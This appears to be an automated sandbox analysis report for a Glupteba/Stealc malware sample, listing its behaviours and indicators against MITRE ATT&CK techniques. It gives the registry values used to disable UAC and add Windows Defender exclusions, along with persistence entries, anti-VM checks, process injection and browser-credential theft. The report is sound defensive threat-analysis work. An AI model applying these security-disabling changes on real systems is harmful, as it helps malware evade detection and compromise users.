glupteba | 95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e

Windows Service

T1543.003

Processes:

AA94amAZhUMMf52xrK6WqgJN.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	AA94amAZhUMMf52xrK6WqgJN.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

Processes:

95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe

Windows security bypass 2 TTPs 7 IoCs

Disable or Modify Tools

T1562.001

Modify Registry

Processes:

AA94amAZhUMMf52xrK6WqgJN.exeIDJwuh7Gfalnn3G3fSt8LiFK.exe95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	AA94amAZhUMMf52xrK6WqgJN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	IDJwuh7Gfalnn3G3fSt8LiFK.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	IDJwuh7Gfalnn3G3fSt8LiFK.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	IDJwuh7Gfalnn3G3fSt8LiFK.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	IDJwuh7Gfalnn3G3fSt8LiFK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe = "0"	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

AA94amAZhUMMf52xrK6WqgJN.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ AA94amAZhUMMf52xrK6WqgJN.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

2572 netsh.exe
2568 netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	AA94amAZhUMMf52xrK6WqgJN.exe

pid	process
2572	netsh.exe
2568	netsh.exe

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

Processes:

AA94amAZhUMMf52xrK6WqgJN.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	AA94amAZhUMMf52xrK6WqgJN.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	AA94amAZhUMMf52xrK6WqgJN.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Drops startup file 6 IoCs

Processes:

jsc.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZG6PtL5Xkcpa46sQ87QEb5v3.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\y117EcYwubvYE3jqzuhuFr85.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VoEzA9ZtSfKjhptPIS4LoWYT.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MBpWmZIk78xidvPH6mX1NJC3.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PgOGKKE2rnTjzoKzw626Es1m.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EEP3vf5e0vJQtL1Gkoh3zrmh.bat	jsc.exe

Executes dropped EXE 17 IoCs

Processes:

5C7CoHlC72ZxGrZ2pQr8gLtb.exeIDJwuh7Gfalnn3G3fSt8LiFK.exeT8aHe9G2jy90tHW1nG82yaRw.exeIDJwuh7Gfalnn3G3fSt8LiFK.exeT8aHe9G2jy90tHW1nG82yaRw.exeAA94amAZhUMMf52xrK6WqgJN.exeupk.0.execsrss.exeinjector.exewindefender.exewindefender.exes2tweovw0BvcM0wIqlTZALVa.exeInstall.exeQg_Appv5.exeUniversalInstaller.exeUniversalInstaller.exeRMWIhxT.exe

pid	process
920	5C7CoHlC72ZxGrZ2pQr8gLtb.exe
1988	IDJwuh7Gfalnn3G3fSt8LiFK.exe
4796	T8aHe9G2jy90tHW1nG82yaRw.exe
1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe
1384	T8aHe9G2jy90tHW1nG82yaRw.exe
3108	AA94amAZhUMMf52xrK6WqgJN.exe
568	upk.0.exe
1408	csrss.exe
3908	injector.exe
4848	windefender.exe
4168	windefender.exe
3572	s2tweovw0BvcM0wIqlTZALVa.exe
784	Install.exe
2616	Qg_Appv5.exe
4276	UniversalInstaller.exe
568	UniversalInstaller.exe
2168	RMWIhxT.exe

Loads dropped DLL 4 IoCs

Processes:

UniversalInstaller.exeUniversalInstaller.exe

pid process

4276 UniversalInstaller.exe
4276 UniversalInstaller.exe
568 UniversalInstaller.exe
568 UniversalInstaller.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
4276	UniversalInstaller.exe
4276	UniversalInstaller.exe
568	UniversalInstaller.exe
568	UniversalInstaller.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\windefender.exe	upx
behavioral2/memory/4848-496-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/4168-500-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/4168-508-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Windows security modification 2 TTPs 8 IoCs

Disable or Modify Tools

T1562.001

Modify Registry

Processes:

IDJwuh7Gfalnn3G3fSt8LiFK.exe95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exeAA94amAZhUMMf52xrK6WqgJN.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	IDJwuh7Gfalnn3G3fSt8LiFK.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	IDJwuh7Gfalnn3G3fSt8LiFK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe = "0"	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	AA94amAZhUMMf52xrK6WqgJN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	IDJwuh7Gfalnn3G3fSt8LiFK.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	IDJwuh7Gfalnn3G3fSt8LiFK.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

Processes:

csrss.exeIDJwuh7Gfalnn3G3fSt8LiFK.exeT8aHe9G2jy90tHW1nG82yaRw.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-801765966-3955847401-2235691403-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-801765966-3955847401-2235691403-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	IDJwuh7Gfalnn3G3fSt8LiFK.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-801765966-3955847401-2235691403-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	T8aHe9G2jy90tHW1nG82yaRw.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

System Information Discovery

Processes:

AA94amAZhUMMf52xrK6WqgJN.exe95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	AA94amAZhUMMf52xrK6WqgJN.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

1 pastebin.com
4 pastebin.com
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

10 api.myip.com
25 api.myip.com
26 ipinfo.io
1 ipinfo.io
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

flow	ioc
1	pastebin.com
4	pastebin.com

flow	ioc
10	api.myip.com
25	api.myip.com
26	ipinfo.io
1	ipinfo.io

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 18 IoCs

Processes:

AA94amAZhUMMf52xrK6WqgJN.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeRMWIhxT.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy	AA94amAZhUMMf52xrK6WqgJN.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	AA94amAZhUMMf52xrK6WqgJN.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	AA94amAZhUMMf52xrK6WqgJN.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	RMWIhxT.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	RMWIhxT.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	AA94amAZhUMMf52xrK6WqgJN.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

AA94amAZhUMMf52xrK6WqgJN.exe

pid process

3108 AA94amAZhUMMf52xrK6WqgJN.exe

pid	process
3108	AA94amAZhUMMf52xrK6WqgJN.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exeUniversalInstaller.execmd.exe

description	pid	process	target process
PID 1384 set thread context of 2304	1384	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe	jsc.exe
PID 568 set thread context of 4956	568	UniversalInstaller.exe	cmd.exe
PID 4956 set thread context of 2448	4956	cmd.exe	MSBuild.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

Processes:

IDJwuh7Gfalnn3G3fSt8LiFK.exeT8aHe9G2jy90tHW1nG82yaRw.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	IDJwuh7Gfalnn3G3fSt8LiFK.exe
File opened (read-only)	\??\VBoxMiniRdrDN	T8aHe9G2jy90tHW1nG82yaRw.exe

Drops file in Windows directory 8 IoCs

Processes:

IDJwuh7Gfalnn3G3fSt8LiFK.exeT8aHe9G2jy90tHW1nG82yaRw.execsrss.exeschtasks.execmd.exe

description	ioc	process
File opened for modification	C:\Windows\rss	IDJwuh7Gfalnn3G3fSt8LiFK.exe
File created	C:\Windows\rss\csrss.exe	IDJwuh7Gfalnn3G3fSt8LiFK.exe
File opened for modification	C:\Windows\rss	T8aHe9G2jy90tHW1nG82yaRw.exe
File created	C:\Windows\rss\csrss.exe	T8aHe9G2jy90tHW1nG82yaRw.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\bWycNackLSywaqkmgR.job	schtasks.exe
File created	C:\Windows\Tasks\GS_Debug.job	cmd.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

4268 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
4268	sc.exe

Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3016	1988	WerFault.exe	IDJwuh7Gfalnn3G3fSt8LiFK.exe
568	4796	WerFault.exe	T8aHe9G2jy90tHW1nG82yaRw.exe
2976	568	WerFault.exe	upk.0.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4880 schtasks.exe
948 schtasks.exe
3912 schtasks.exe
1568 schtasks.exe

pid	process
4880	schtasks.exe
948	schtasks.exe
3912	schtasks.exe
1568	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exewindefender.exeT8aHe9G2jy90tHW1nG82yaRw.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	T8aHe9G2jy90tHW1nG82yaRw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	T8aHe9G2jy90tHW1nG82yaRw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-572 = "China Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	T8aHe9G2jy90tHW1nG82yaRw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	T8aHe9G2jy90tHW1nG82yaRw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	T8aHe9G2jy90tHW1nG82yaRw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	T8aHe9G2jy90tHW1nG82yaRw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	T8aHe9G2jy90tHW1nG82yaRw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	T8aHe9G2jy90tHW1nG82yaRw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	T8aHe9G2jy90tHW1nG82yaRw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2612 = "Bougainville Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-492 = "India Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	T8aHe9G2jy90tHW1nG82yaRw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	T8aHe9G2jy90tHW1nG82yaRw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	T8aHe9G2jy90tHW1nG82yaRw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	T8aHe9G2jy90tHW1nG82yaRw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1502 = "Turkey Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exeT8aHe9G2jy90tHW1nG82yaRw.exeIDJwuh7Gfalnn3G3fSt8LiFK.exepowershell.exepowershell.exeT8aHe9G2jy90tHW1nG82yaRw.exeIDJwuh7Gfalnn3G3fSt8LiFK.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeinjector.execsrss.exe

pid	process
4324	powershell.exe
4324	powershell.exe
1288	powershell.exe
1288	powershell.exe
4812	powershell.exe
4812	powershell.exe
4796	T8aHe9G2jy90tHW1nG82yaRw.exe
1988	IDJwuh7Gfalnn3G3fSt8LiFK.exe
1988	IDJwuh7Gfalnn3G3fSt8LiFK.exe
4796	T8aHe9G2jy90tHW1nG82yaRw.exe
2496	powershell.exe
3780	powershell.exe
2496	powershell.exe
3780	powershell.exe
1384	T8aHe9G2jy90tHW1nG82yaRw.exe
1384	T8aHe9G2jy90tHW1nG82yaRw.exe
1384	T8aHe9G2jy90tHW1nG82yaRw.exe
1384	T8aHe9G2jy90tHW1nG82yaRw.exe
1384	T8aHe9G2jy90tHW1nG82yaRw.exe
1384	T8aHe9G2jy90tHW1nG82yaRw.exe
1384	T8aHe9G2jy90tHW1nG82yaRw.exe
1384	T8aHe9G2jy90tHW1nG82yaRw.exe
1384	T8aHe9G2jy90tHW1nG82yaRw.exe
1384	T8aHe9G2jy90tHW1nG82yaRw.exe
1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe
1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe
1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe
1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe
1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe
1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe
1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe
1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe
